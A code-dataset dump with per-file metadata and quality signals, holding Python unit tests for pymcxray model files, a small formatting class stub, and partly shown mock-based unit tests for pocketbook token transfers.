hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
30246c96fb84104834e1dc10d2e095c84bd5af1d
| 20,926
|
py
|
Python
|
pymcxray/FileFormat/test_Models.py
|
drix00/pymcxray
|
bf650aa0f31c635040a6cb79fe1cb7ecf27b8990
|
[
"Apache-2.0"
] | 1
|
2020-07-23T12:13:30.000Z
|
2020-07-23T12:13:30.000Z
|
pymcxray/FileFormat/test_Models.py
|
drix00/pymcxray
|
bf650aa0f31c635040a6cb79fe1cb7ecf27b8990
|
[
"Apache-2.0"
] | 3
|
2017-03-05T16:09:30.000Z
|
2017-03-05T16:11:41.000Z
|
pymcxray/FileFormat/test_Models.py
|
drix00/pymcxray
|
bf650aa0f31c635040a6cb79fe1cb7ecf27b8990
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""
.. py:currentmodule:: FileFormat.test_Models
.. moduleauthor:: Hendrix Demers <hendrix.demers@mail.mcgill.ca>
Tests module `Models`.
"""
# Script information for the file.
__author__ = "Hendrix Demers (hendrix.demers@mail.mcgill.ca)"
__version__ = ""
__date__ = ""
__copyright__ = "Copyright (c) 2012 Hendrix Demers"
__license__ = ""
# Subversion informations for the file.
__svnRevision__ = "$Revision$"
__svnDate__ = "$Date$"
__svnId__ = "$Id$"
# Standard library modules.
import unittest
import logging
import os.path
# Third party modules.
from nose.plugins.skip import SkipTest
# Local modules.
# Project modules
import pymcxray.FileFormat.Models as Models
import pymcxray.FileFormat.MCXRayModel as MCXRayModel
import pymcxray.FileFormat.testUtilities as testUtilities
import pymcxray.FileFormat.Version as Version
# Globals and constants variables.
class TestModels(unittest.TestCase):
    """
    TestCase class for the module `Models`.

    Read tests check that each versioned ``.mdl`` reference file yields the
    expected model types; write tests regenerate a file and compare it line
    by line against the reference.
    """

    def setUp(self):
        """
        Setup method: locate the test data and create a temporary data path
        for the write tests.
        """
        unittest.TestCase.setUp(self)

        self.testDataPath = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../test_data"))
        self.tempDataPath = testUtilities.createTempDataPath(self.testDataPath)
        # Expected number of entries in a Models container / key list.
        self.numberModels = 13

    def tearDown(self):
        """
        Teardown method: remove the temporary data path created in `setUp`.
        """
        unittest.TestCase.tearDown(self)

        testUtilities.removeTempDataPath(self.tempDataPath)

    def testSkeleton(self):
        """
        First test to check if the testcase is working with the testing framework.
        """
        # `assert_` is a deprecated alias; `assertTrue` is the supported spelling.
        self.assertTrue(True)

    def _readModels(self, *pathParts):
        """
        Read a model file located under the test data path.

        :param pathParts: path components joined under `self.testDataPath`.
        :return: the populated :class:`Models.Models` instance.
        """
        filepath = os.path.abspath(os.path.join(self.testDataPath, *pathParts))
        models = Models.Models()
        models.read(filepath)
        return models

    def _assertVersion(self, versionRef, models):
        """
        Assert that `models.version` equals `versionRef`, component by component
        and as a whole.
        """
        self.assertEqual(versionRef.major, models.version.major)
        self.assertEqual(versionRef.minor, models.version.minor)
        self.assertEqual(versionRef.revision, models.version.revision)
        self.assertEqual(versionRef, models.version)

    def _assertModelList(self, modelList, crossSectionType, collisionType,
                         characteristicType, bremsstrahlungType,
                         checkRegionModels=False):
        """
        Assert the expected model types in `modelList`.

        Models that vary between file versions (cross section, collision,
        characteristic, bremsstrahlung) are passed in as parameters; the
        models common to every version are checked against fixed values.

        :param checkRegionModels: also check the region energy loss and mass
            absorption coefficient models (only asserted for files that
            specify them).
        """
        self.assertEqual(self.numberModels, len(modelList))

        self.assertEqual(MCXRayModel.AtomMeanIonizationPotentialModel.TYPE_JOY_LUO, modelList[Models.KEY_ATOM_MEAN_IONIZATION_POTENTIAL_MODEL].getModel())
        self.assertEqual(MCXRayModel.AtomEnergyLossModel.TYPE_BETHE, modelList[Models.KEY_ATOM_ENERGY_LOSS_MODEL].getModel())
        self.assertEqual(MCXRayModel.AtomScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_SCREENING_MODEL].getModel())
        self.assertEqual(crossSectionType, modelList[Models.KEY_ATOM_CROSS_SECTION_MODEL].getModel())
        self.assertEqual(MCXRayModel.AtomCrossSectionScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_CROSS_SECTION_SCREENING_MODEL].getModel())
        self.assertEqual(collisionType, modelList[Models.KEY_ATOM_COLLISION_MODEL].getModel())
        self.assertEqual(MCXRayModel.AtomCollisionScreeningModel.TYPE_HENOC_MAURICE, modelList[Models.KEY_ATOM_COLLISION_SCREENING_MODEL].getModel())
        self.assertEqual(MCXRayModel.AtomElectronRangeModel.TYPE_KANAYA_OKAYAMA, modelList[Models.KEY_ATOM_ELECTRON_RANGE_MODEL].getModel())
        self.assertEqual(characteristicType, modelList[Models.KEY_XRAY_CS_CHARACTERISTIC_MODEL].getModel())
        self.assertEqual(bremsstrahlungType, modelList[Models.KEY_XRAY_CS_BREMSSTRAHLUNG_MODEL].getModel())
        self.assertEqual(MCXRayModel.SampleEnergyLossModel.TYPE_BETHE_JOY_LUO, modelList[Models.KEY_SAMPLE_ENERGY_LOSS_MODEL].getModel())

        if checkRegionModels:
            self.assertEqual(MCXRayModel.RegionEnergyLossModel.TYPE_BETHE_JOY_LUO, modelList[Models.KEY_REGION_ENERGY_LOSS_MODEL].getModel())
            self.assertEqual(MCXRayModel.MassAbsorptionCoefficientModel.TYPE_CHANTLER2005, modelList[Models.KEY_MASS_ABSORPTION_COEFFICIENT_MODEL].getModel())

    def test_read(self):
        """
        Tests for method `read` using every simulation title's model file.
        """
        for title in testUtilities.getSimulationTitles():
            models = self._readModels("%s/%s.mdl" % (title, title))

            self._assertModelList(models.getModelList(),
                                  MCXRayModel.AtomCrossSectionModel.TYPE_BROWNING,
                                  MCXRayModel.AtomCollisionModel.TYPE_BROWNING,
                                  MCXRayModel.XRayCSCharacteristicModel.TYPE_CASTANI1982,
                                  MCXRayModel.XRayCSBremsstrahlungModel.TYPE_DING,
                                  checkRegionModels=True)

    def test_read_1_1_1(self):
        """
        Tests for method `read` with a version 1.1.1 file.
        """
        models = self._readModels("inputs", "AlMgBulk5keV_version_1_1_1.mdl")

        self._assertVersion(Version.VERSION_1_1_1, models)
        self._assertModelList(models.getModelList(),
                              MCXRayModel.AtomCrossSectionModel.TYPE_BROWNING,
                              MCXRayModel.AtomCollisionModel.TYPE_BROWNING,
                              MCXRayModel.XRayCSCharacteristicModel.TYPE_CASTANI1982,
                              MCXRayModel.XRayCSBremsstrahlungModel.TYPE_KIRKPATRICK_WIEDMAN)

    def test_read_1_2_0(self):
        """
        Tests for method `read` with a version 1.2.0 file.
        """
        models = self._readModels("inputs", "AlMgBulk5keV_version_1_2_0.mdl")

        self._assertVersion(Version.VERSION_1_2_0, models)
        self._assertModelList(models.getModelList(),
                              MCXRayModel.AtomCrossSectionModel.TYPE_GAUVIN_DROUIN,
                              MCXRayModel.AtomCollisionModel.TYPE_RUTHERFORD,
                              MCXRayModel.XRayCSCharacteristicModel.TYPE_CASTANI1982,
                              MCXRayModel.XRayCSBremsstrahlungModel.TYPE_DING)

    def test_read_1_2_1(self):
        """
        Tests for method `read` with a version 1.2.1 file.
        """
        models = self._readModels("inputs", "AlMgBulk5keV_version_1_2_1.mdl")

        self._assertVersion(Version.VERSION_1_2_1, models)
        self._assertModelList(models.getModelList(),
                              MCXRayModel.AtomCrossSectionModel.TYPE_GAUVIN_DROUIN,
                              MCXRayModel.AtomCollisionModel.TYPE_RUTHERFORD,
                              MCXRayModel.XRayCSCharacteristicModel.TYPE_CASTANI1982,
                              MCXRayModel.XRayCSBremsstrahlungModel.TYPE_DING)

    def test_read_1_4_1(self):
        """
        Tests for method `read` with a version 1.4.1 file (includes region
        energy loss and mass absorption coefficient models).
        """
        models = self._readModels("inputs", "AlMgBulk5keV_version_1_4_1.mdl")

        self._assertVersion(Version.VERSION_1_4_1, models)
        self._assertModelList(models.getModelList(),
                              MCXRayModel.AtomCrossSectionModel.TYPE_GAUVIN_DROUIN,
                              MCXRayModel.AtomCollisionModel.TYPE_RUTHERFORD,
                              MCXRayModel.XRayCSCharacteristicModel.TYPE_CASTANI1982,
                              MCXRayModel.XRayCSBremsstrahlungModel.TYPE_DING,
                              checkRegionModels=True)

    def test__createKeys(self):
        """
        Tests for method `_createKeys`: one key per expected model.
        """
        keys = Models.Models()._createKeys()
        self.assertEqual(self.numberModels, len(keys))

    def testDefaultModels(self):
        """
        Tests the default model types of a freshly constructed `Models`.
        """
        models = Models.Models()

        self._assertModelList(models.getModelList(),
                              MCXRayModel.AtomCrossSectionModel.TYPE_BROWNING,
                              MCXRayModel.AtomCollisionModel.TYPE_BROWNING,
                              MCXRayModel.XRayCSCharacteristicModel.TYPE_BOTE2009,
                              MCXRayModel.XRayCSBremsstrahlungModel.TYPE_KIRKPATRICK_WIEDMAN)

    def _makeWriteModels(self, version=None):
        """
        Create a `Models` object configured as the write reference files expect.

        When `version` is given, the version is set and the models that differ
        from the defaults in versioned reference files are overridden as well.
        """
        models = Models.Models()
        if version is not None:
            models.version = version
            models._modelList[Models.KEY_XRAY_CS_CHARACTERISTIC_MODEL].setModel(MCXRayModel.XRayCSCharacteristicModel.TYPE_CASTANI1982)
            models._modelList[Models.KEY_ATOM_CROSS_SECTION_MODEL].setModel(MCXRayModel.AtomCrossSectionModel.TYPE_GAUVIN_DROUIN)
            models._modelList[Models.KEY_ATOM_COLLISION_MODEL].setModel(MCXRayModel.AtomCollisionModel.TYPE_RUTHERFORD)
        models._modelList[Models.KEY_XRAY_CS_BREMSSTRAHLUNG_MODEL].setModel(MCXRayModel.XRayCSBremsstrahlungModel.TYPE_DING)
        return models

    def _assertFilesEqual(self, filepathReference, filepath):
        """
        Assert that the two files contain identical lines.

        Uses ``with`` so the file handles are closed even on assertion failure
        (the original code leaked the handles).
        """
        with open(filepathReference, 'r') as fileRef:
            linesRef = fileRef.readlines()
        with open(filepath, 'r') as file:
            lines = file.readlines()
        self.assertListEqual(linesRef, lines)

    def test_write(self):
        """
        Tests for method `write`.
        """
        # Skipped in the original code; presumably the reference files no
        # longer match the current write output -- TODO confirm and re-enable.
        raise SkipTest

        self.maxDiff = None

        for title in testUtilities.getSimulationTitles():
            filepathReference = os.path.abspath(os.path.join(self.testDataPath, "%s/%s.mdl" % (title, title)))
            filepath = os.path.join(self.tempDataPath, "%s.mdl" % (title))

            models = self._makeWriteModels()
            models.write(filepath)

            self._assertFilesEqual(filepathReference, filepath)

    def test_write_1_1_1(self):
        """
        Tests for method `write` with version 1.1.1.
        """
        # Skipped in the original code; the trailing self.fail() it contained
        # was unreachable dead code and has been removed.
        raise SkipTest

        self.maxDiff = None

        title = "AlMgBulk5keV_version_1_1_1"
        filepathReference = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.mdl" % (title)))
        filepath = os.path.join(self.tempDataPath, "%s.par" % (title))

        models = self._makeWriteModels()
        models.write(filepath)

        self._assertFilesEqual(filepathReference, filepath)

    def test_write_1_2_0(self):
        """
        Tests for method `write` with version 1.2.0.
        """
        self.maxDiff = None

        title = "AlMgBulk5keV_version_1_2_0"
        filepathReference = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.mdl" % (title)))
        filepath = os.path.join(self.tempDataPath, "%s.par" % (title))

        models = self._makeWriteModels(version=Version.VERSION_1_2_0)
        models.write(filepath)

        self._assertFilesEqual(filepathReference, filepath)

    def test_write_1_2_1(self):
        """
        Tests for method `write` with version 1.2.1.
        """
        self.maxDiff = None

        title = "AlMgBulk5keV_version_1_2_1"
        filepathReference = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.mdl" % (title)))
        filepath = os.path.join(self.tempDataPath, "%s.par" % (title))

        models = self._makeWriteModels(version=Version.VERSION_1_2_1)
        models.write(filepath)

        self._assertFilesEqual(filepathReference, filepath)

    def test_write_1_4_1(self):
        """
        Tests for method `write` with version 1.4.1.
        """
        self.maxDiff = None

        title = "AlMgBulk5keV_version_1_4_1"
        filepathReference = os.path.abspath(os.path.join(self.testDataPath, "inputs", "%s.mdl" % (title)))
        filepath = os.path.join(self.tempDataPath, "%s.par" % (title))

        models = self._makeWriteModels(version=Version.VERSION_1_4_1)
        models.write(filepath)

        self._assertFilesEqual(filepathReference, filepath)
# Script entry point: run this module's tests through the nose runner.
if __name__ == '__main__': #pragma: no cover
    import nose
    nose.runmodule()
| 51.541872
| 161
| 0.751314
| 2,264
| 20,926
| 6.653269
| 0.083039
| 0.098785
| 0.100378
| 0.123216
| 0.923189
| 0.913829
| 0.911771
| 0.903804
| 0.893912
| 0.889796
| 0
| 0.009143
| 0.148045
| 20,926
| 405
| 162
| 51.669136
| 0.835764
| 0.064513
| 0
| 0.701754
| 0
| 0
| 0.026892
| 0.012456
| 0
| 0
| 0
| 0
| 0.434211
| 1
| 0.065789
| false
| 0
| 0.039474
| 0
| 0.109649
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
06ac8da4ef92ac43c59ca28a4de8fa7211847b84
| 214
|
py
|
Python
|
proxydetectorfirewall/format/format.py
|
Juvenal-Yescas/ProxyDetector-Firewall
|
fed1db3d2be28ce55f797a134c65d18d09110c0b
|
[
"MIT"
] | 4
|
2019-10-22T01:27:47.000Z
|
2021-03-01T08:33:09.000Z
|
proxydetectorfirewall/format/format.py
|
Juvenal-Yescas/ProxyDetector-Firewall
|
fed1db3d2be28ce55f797a134c65d18d09110c0b
|
[
"MIT"
] | null | null | null |
proxydetectorfirewall/format/format.py
|
Juvenal-Yescas/ProxyDetector-Firewall
|
fed1db3d2be28ce55f797a134c65d18d09110c0b
|
[
"MIT"
] | 3
|
2019-12-02T08:24:52.000Z
|
2020-09-11T13:40:57.000Z
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
class Format:
    """Holder for an output header plus a formatting hook.

    ``getFormat`` is a stub here; presumably concrete formatters subclass
    this and override it -- TODO confirm against callers.
    """

    def __init__(self):
        # The header is empty until something assigns ``header_file``.
        self.header_file = ''

    def get_header(self):
        """Return the currently stored header string."""
        return self.header_file

    def getFormat(self, ip):
        """Format *ip*; the base implementation does nothing (returns None)."""
        return None
| 16.461538
| 31
| 0.579439
| 27
| 214
| 4.333333
| 0.666667
| 0.17094
| 0.239316
| 0.290598
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012987
| 0.280374
| 214
| 13
| 32
| 16.461538
| 0.746753
| 0.182243
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0.142857
| 0
| 0.142857
| 0.714286
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
88d86652ba11900936fea83cfbb75ae2dc32474f
| 14,659
|
py
|
Python
|
tests/commands/test_transfer.py
|
ejfitzgerald/tools-pocketbook
|
c36254f3e39e875cacf50a5e90b9723e19c1ed9b
|
[
"Apache-2.0"
] | 1
|
2021-09-08T05:30:11.000Z
|
2021-09-08T05:30:11.000Z
|
tests/commands/test_transfer.py
|
ejfitzgerald/tools-pocketbook
|
c36254f3e39e875cacf50a5e90b9723e19c1ed9b
|
[
"Apache-2.0"
] | 14
|
2019-12-30T17:43:22.000Z
|
2021-11-18T10:45:14.000Z
|
tests/commands/test_transfer.py
|
ejfitzgerald/tools-pocketbook
|
c36254f3e39e875cacf50a5e90b9723e19c1ed9b
|
[
"Apache-2.0"
] | 3
|
2019-12-24T10:50:44.000Z
|
2021-11-20T21:24:32.000Z
|
import unittest
from unittest.mock import patch, Mock, MagicMock
from fetchai.ledger.api.token import TokenTxFactory
from fetchai.ledger.crypto import Entity, Address
from fetchai.ledger.serialisation.transaction import encode_transaction
from pocketbook.address_book import AddressBook
from pocketbook.key_store import KeyStore
from pocketbook.utils import create_api
class Person:
    """Test fixture: a named identity with a freshly generated `Entity` keypair
    and the `Address` derived from that entity."""

    def __init__(self, name):
        """Store *name* (coerced to str) and generate a new entity/address pair."""
        self.name = str(name)
        self.entity = Entity()
        self.address = Address(self.entity)
class TransferCommandUnitTests(unittest.TestCase):
    @patch('getpass.getpass', side_effect=['weak-password'])
    @patch('builtins.input', return_value='')
    @patch('pocketbook.utils.create_api', spec=create_api)
    @patch('fetchai.ledger.api.token.TokenTxFactory', spec=TokenTxFactory)
    @patch('pocketbook.address_book.AddressBook', spec=AddressBook)
    @patch('pocketbook.key_store.KeyStore', spec=KeyStore)
    def test_transfer_to_addr_dest(self, MockKeyStore, MockAddressBook, MockTxFactory, mock_create_api, *args):
        """Transfer where the destination name is resolved via the address book."""
        person1 = Person('Jane')   # sender: key held in the key store
        person2 = Person('Clare')  # recipient: known only to the address book

        # Key store contains only the sender's key.
        key_store = MockKeyStore()
        key_store.list_keys.return_value = [person1.name]
        key_store.load_key.return_value = person1.entity

        # Address book resolves the recipient's name to an address.
        address_book = MockAddressBook()
        address_book.keys.return_value = [person2.name]
        address_book.lookup_address.return_value = person2.address

        api = MagicMock()
        mock_create_api.return_value = api
        api.submit_signed_tx.side_effect = ['0xTransactionHexId']

        # setup tx and tx factory
        tx = MagicMock()
        MockTxFactory.transfer.side_effect = [tx]

        # Argparse-style namespace driving the transfer command.
        args = Mock()
        args.destination = person2.name
        args.amount = 20000000000
        args.charge_rate = 1
        args.signers = [person1.name]
        args.from_address = None
        args.network = 'super-duper-net'

        # Imported here, after the patches above are active.
        from pocketbook.commands.transfer import run_transfer
        run_transfer(args)

        # create api and lookup the addresses from the key store and address book
        mock_create_api.assert_called_once_with('super-duper-net')
        key_store.load_key.assert_called_once_with(person1.name, 'weak-password')

        # expectations for configuring the transaction
        MockTxFactory.transfer.assert_called_once_with(Address(person1.address), person2.address, 20000000000, 0,
                                                       [person1.entity])
        self.assertEqual(tx.charge_rate, 1)
        self.assertEqual(tx.charge_limit, 1)
        api.set_validity_period.assert_called_once_with(tx)
        tx.sign.assert_called_with(person1.entity)

        # submission of the transaction
        api.submit_signed_tx.assert_called_once_with(tx)
        api.sync.assert_called_once_with('0xTransactionHexId')
    @patch('getpass.getpass', side_effect=['weak-password'])
    @patch('builtins.input', return_value='')
    @patch('pocketbook.utils.create_api', spec=create_api)
    @patch('fetchai.ledger.api.token.TokenTxFactory', spec=TokenTxFactory)
    @patch('pocketbook.address_book.AddressBook', spec=AddressBook)
    @patch('pocketbook.key_store.KeyStore', spec=KeyStore)
    def test_transfer_to_key_dest(self, MockKeyStore, MockAddressBook, MockTxFactory, mock_create_api, *args):
        """Transfer where the destination name is resolved via the key store."""
        person1 = Person('Jane')   # sender
        person2 = Person('Clare')  # recipient: also a key in the key store

        # Key store holds both names; lookup_address resolves the recipient.
        key_store = MockKeyStore()
        key_store.list_keys.side_effect = [[person1.name, person2.name]]
        key_store.load_key.side_effect = [person1.entity, person2.entity]
        key_store.lookup_address.side_effect = [person2.address]

        # Address book is empty, so resolution falls through to the key store.
        address_book = MockAddressBook()
        address_book.keys.return_value = []

        api = MagicMock()
        mock_create_api.return_value = api
        api.submit_signed_tx.side_effect = ['0xTransactionHexId']

        # setup tx and tx factory
        tx = MagicMock()
        MockTxFactory.transfer.side_effect = [tx]

        # Argparse-style namespace driving the transfer command.
        args = Mock()
        args.destination = person2.name
        args.amount = 20000000000
        args.charge_rate = 2
        args.signers = [person1.name]
        args.from_address = None
        args.network = 'super-duper-net'

        # Imported here, after the patches above are active.
        from pocketbook.commands.transfer import run_transfer
        run_transfer(args)

        # create api and lookup the addresses from the key store and address book
        mock_create_api.assert_called_once_with('super-duper-net')
        key_store.lookup_address.assert_called_once_with(person2.name)
        key_store.load_key.assert_called_once_with(person1.name, 'weak-password')

        # expectations for configuring the transaction
        MockTxFactory.transfer.assert_called_once_with(person1.address, person2.address, 20000000000, 0,
                                                       [person1.entity])
        self.assertEqual(tx.charge_rate, 2)
        self.assertEqual(tx.charge_limit, 1)
        api.set_validity_period.assert_called_once_with(tx)
        tx.sign.assert_called_with(person1.entity)

        # submission of the transaction
        api.submit_signed_tx.assert_called_once_with(tx)
        api.sync.assert_called_once_with('0xTransactionHexId')
    @patch('getpass.getpass', side_effect=['weak-password'])
    @patch('builtins.input', return_value='')
    @patch('pocketbook.utils.create_api', spec=create_api)
    @patch('fetchai.ledger.api.token.TokenTxFactory', spec=TokenTxFactory)
    @patch('pocketbook.address_book.AddressBook', spec=AddressBook)
    @patch('pocketbook.key_store.KeyStore', spec=KeyStore)
    def test_transfer_to_new_dest(self, MockKeyStore, MockAddressBook, MockTxFactory, mock_create_api, *args):
        """Transfer where the destination is a raw address string, unknown to
        both the key store and the address book."""
        person1 = Person('Jane')   # sender
        person2 = Person('Clare')  # recipient, addressed directly by address string

        # Key store knows both names but cannot resolve the destination address.
        key_store = MockKeyStore()
        key_store.list_keys.return_value = [person1.name, person2.name]
        key_store.load_key.side_effect = [person1.entity]
        key_store.lookup_address.return_value = None

        # Address book is empty as well.
        address_book = MockAddressBook()
        address_book.keys.return_value = []

        api = MagicMock()
        mock_create_api.return_value = api
        api.submit_signed_tx.side_effect = ['0xTransactionHexId']

        # setup tx and tx factory
        tx = MagicMock()
        MockTxFactory.transfer.side_effect = [tx]

        # Argparse-style namespace; destination is the literal address text.
        args = Mock()
        args.destination = str(person2.address)
        args.amount = 20000000000
        args.charge_rate = 1
        args.signers = [person1.name]
        args.from_address = None
        args.network = 'super-duper-net'

        # Imported here, after the patches above are active.
        from pocketbook.commands.transfer import run_transfer
        run_transfer(args)

        # create api and lookup the addresses from the key store and address book
        mock_create_api.assert_called_once_with('super-duper-net')
        key_store.load_key.assert_called_once_with(person1.name, 'weak-password')

        # expectations for configuring the transaction
        MockTxFactory.transfer.assert_called_once_with(Address(person1.address), person2.address, 20000000000, 0,
                                                       [person1.entity])
        self.assertEqual(tx.charge_rate, 1)
        self.assertEqual(tx.charge_limit, 1)
        api.set_validity_period.assert_called_once_with(tx)
        tx.sign.assert_called_with(person1.entity)

        # submission of the transaction
        api.submit_signed_tx.assert_called_once_with(tx)
        api.sync.assert_called_once_with('0xTransactionHexId')
@patch('getpass.getpass', side_effect=['weak-password'])
@patch('builtins.input', return_value='')
@patch('pocketbook.utils.create_api', spec=create_api)
@patch('fetchai.ledger.api.token.TokenTxFactory', spec=TokenTxFactory)
@patch('pocketbook.address_book.AddressBook', spec=AddressBook)
@patch('pocketbook.key_store.KeyStore', spec=KeyStore)
def test_multisig_transfer(self, MockKeyStore, MockAddressBook, MockTxFactory, mock_create_api, *args):
multisig = Person('MultiSig')
person1 = Person('Jane')
person2 = Person('Clare')
key_store = MockKeyStore()
key_store.list_keys.return_value = [person1.name, person2.name]
key_store.load_key.side_effect = [person1.entity]
key_store.lookup_address.return_value = person2.address
address_book = MockAddressBook()
address_book.keys.return_value = [multisig.name]
address_book.lookup_address.return_value = multisig.address
api = MagicMock()
mock_create_api.return_value = api
api.submit_signed_tx.side_effect = ['0xTransactionHexId']
# setup tx and tx factory
tx = MagicMock()
MockTxFactory.transfer.side_effect = [tx]
args = Mock()
args.destination = person2.name
args.amount = 20000000000
args.charge_rate = 1
args.signers = [person1.name]
args.from_address = multisig.name
args.network = 'super-duper-net'
from pocketbook.commands.transfer import run_transfer
run_transfer(args)
# create api and lookup the addresses from the key store and address book
mock_create_api.assert_called_once_with('super-duper-net')
address_book.lookup_address.assert_called_once_with(multisig.name)
key_store.lookup_address.assert_called_once_with(person2.name)
key_store.load_key.assert_called_once_with(person1.name, 'weak-password')
# expectations for configuring the transaction
MockTxFactory.transfer.assert_called_once_with(Address(multisig.address), person2.address, 20000000000, 0,
[person1.entity])
self.assertEqual(tx.charge_rate, 1)
self.assertEqual(tx.charge_limit, 1)
api.set_validity_period.assert_called_once_with(tx)
tx.sign.assert_called_with(person1.entity)
# submission of the transaction
api.submit_signed_tx.assert_called_once_with(tx)
api.sync.assert_called_once_with('0xTransactionHexId')
@patch('getpass.getpass', side_effect=['weak-password'])
@patch('builtins.input', return_value='')
@patch('fetchai.ledger.serialisation.transaction.encode_transaction', spec=encode_transaction)
@patch('pocketbook.utils.create_api', spec=create_api)
@patch('pocketbook.address_book.AddressBook', spec=AddressBook)
@patch('pocketbook.key_store.KeyStore', spec=KeyStore)
def test_error_when_signer_not_present(self, MockKeyStore, MockAddressBook, mock_create_api,
mock_encode_transaction, *args):
person1 = Person('Jane')
person2 = Person('Clare')
